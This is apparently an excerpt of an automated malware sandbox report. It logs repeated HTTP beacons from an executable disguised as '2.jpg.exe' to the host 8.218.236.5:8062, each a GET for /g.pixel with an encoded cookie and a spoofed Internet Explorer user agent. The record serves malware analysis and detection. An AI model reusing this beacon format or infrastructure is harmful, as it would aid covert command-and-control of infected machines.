Apr 19, 2024 09:52:50.423317909 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:50.750772953 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
218	192.168.2.4	49954	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:51.184426069 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:51.507703066 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
219	192.168.2.4	49955	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:51.938976049 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:52.265281916 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
220	192.168.2.4	49956	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:52.694231987 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:53.011755943 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
221	192.168.2.4	49957	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:53.453536987 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:53.780586958 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
222	192.168.2.4	49958	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:54.220988035 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:54.553122044 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
223	192.168.2.4	49959	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:54.988238096 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:55.309191942 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
224	192.168.2.4	49960	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:55.749094009 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:56.075943947 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
225	192.168.2.4	49961	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:56.528860092 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:56.867722988 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
226	192.168.2.4	49962	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:57.297964096 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:57.610459089 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
227	192.168.2.4	49963	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:58.050915956 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:58.378549099 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
228	192.168.2.4	49964	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:58.807662964 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:59.130950928 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
229	192.168.2.4	49965	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:59.565825939 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:59.897444010 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
230	192.168.2.4	49966	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:00.336796999 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:00.660995960 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
231	192.168.2.4	49967	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:01.077363014 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:01.388762951 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
232	192.168.2.4	49968	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:01.831455946 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:02.163028002 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
233	192.168.2.4	49969	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:02.584661007 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:02.902736902 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
234	192.168.2.4	49970	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:03.352248907 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:03.677175045 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
235	192.168.2.4	49971	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:04.114854097 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:04.446613073 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
236	192.168.2.4	49972	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:04.881364107 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:05.200366974 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
237	192.168.2.4	49973	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:05.630125046 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:05.950920105 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
238	192.168.2.4	49974	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:06.392117023 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:06.719546080 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
239	192.168.2.4	49975	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:07.158284903 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:07.483975887 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
240	192.168.2.4	49976	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:07.924380064 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:08.251409054 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
241	192.168.2.4	49977	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:08.697653055 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:09.035548925 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
242	192.168.2.4	49978	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:09.481158018 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:09.822205067 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
243	192.168.2.4	49979	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:10.261579037 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:10.583969116 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
244	192.168.2.4	49980	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:11.003233910 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:11.323748112 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
245	192.168.2.4	49981	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:11.816255093 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:12.135246992 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
246	192.168.2.4	49982	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
